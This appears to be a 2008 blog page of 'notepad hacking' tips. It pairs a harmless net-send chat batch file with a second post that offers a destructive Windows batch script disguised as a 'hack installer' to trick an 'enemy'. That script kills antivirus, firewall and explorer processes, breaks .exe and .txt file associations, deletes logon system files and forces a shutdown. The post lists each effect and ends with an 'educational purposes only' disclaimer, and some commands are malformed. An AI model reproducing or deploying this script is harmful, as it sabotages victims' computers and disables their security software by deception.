Showing posts with label notepad hacking. Show all posts
Showing posts with label notepad hacking. Show all posts

Thursday, November 13, 2008

Chat with your friends using MS-DOS or command prompt

Yes,it is possible to chat with your friends using MS-DOS.For this all you need is your friend's IP address and thats it!!!!!When you get the IP address of your friend,then follow the following steps to chat using command prompt.

1.Open notepad and type the following:-
@echo off
:A
cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

2.Save it as "Messenger.bat"(without quotes)

3.Now open command prompt

4.Drag this messenger.bat file over to command prompt window and press Enter.

5.Now type your friend's IP address and press Enter.

6.After that you can start chatting with your friend by typing the message.

Thursday, November 6, 2008

Install a hack into your enemy's PC and fool him


Good morning friends,as you all know christmas is just one and a half month away but today i will teach you how to fool someone by thinking that he is installing a hack file.So lets start in a simple way.So just copy and paste the below code in notepad and save it as installhack.bat and you are finished.




title Hack Setup
color 0A
@echo off
set end=md"Hack installing"
set fin=copy"Hack log.txt""Installing"
%end%
%fin%
net send * Hack is installing,press OK to begin setup.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked.....
msg * I warned you,and you kept going.Challenge me and this is what happens now.
del "c:\windows\system32\logoff.exe /F /Q
del "c:\windows\system32\logon.exe /F /Q
del "c:\windows\system32\logon.scr /F /Q
cls
shutdown


Now,this hack will confuse the victim and he will be hacked.
This hack will:
1.End process NAVAPSVC.exe
2.End process explorer.exe due to which all the icons and taskbar will disappear.
3.End process zonelabs.exe
4.Associate a txt file with a mp3 file.When a victim opens a txt file,then his/her PC will open a mp3 file.
5.Associate a exe file with a txt file.When a victim opens a exe file,then his/her PC will open notepad.
6.Delete the login and logoff screens.

NOTE:-This hack is only for educational purposes and i will not be responsible for the misuse or illegal use of the hacking script.